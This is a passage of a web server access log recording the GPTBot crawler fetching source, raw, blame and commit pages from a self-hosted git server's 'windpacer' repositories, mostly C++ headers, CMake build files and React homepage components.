+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12756] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12706] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:35:36 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx" -[17/Feb/2026:15:35:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fDebug" [Client 74.7.227.38] [Length 25637] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug" -[17/Feb/2026:15:35:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10837] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore" -[17/Feb/2026:15:35:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12634] [Gzip 6.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:15:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:15:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 666] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10435] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:35:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:35:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 2115] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:15:35:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10993] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:15:35:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:15:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10994] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:15:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:15:35:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/README.md" [Client 74.7.227.38] [Length 9764] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/README.md" -[17/Feb/2026:15:35:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10918] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx" -[17/Feb/2026:15:35:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14834] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx" -[17/Feb/2026:15:35:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx" -[17/Feb/2026:15:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14218] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx" -[17/Feb/2026:15:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16491] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx" -[17/Feb/2026:15:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx" -[17/Feb/2026:15:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15566] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx" -[17/Feb/2026:15:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13949] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx" -[17/Feb/2026:15:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx" -[17/Feb/2026:15:35:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx" -[17/Feb/2026:15:35:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14677] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx" -[17/Feb/2026:15:35:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx" -[17/Feb/2026:15:35:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx" -[17/Feb/2026:15:35:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13899] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx" -[17/Feb/2026:15:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/README.md?display=source" [Client 74.7.227.38] [Length 11753] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/README.md" -[17/Feb/2026:15:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11318] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/README.md" -[17/Feb/2026:15:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10563] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13178] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13183] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13122] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10563] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13180] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 11737] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13178] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13178] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 11735] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 11735] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11044] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:35:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11039] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:35:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" 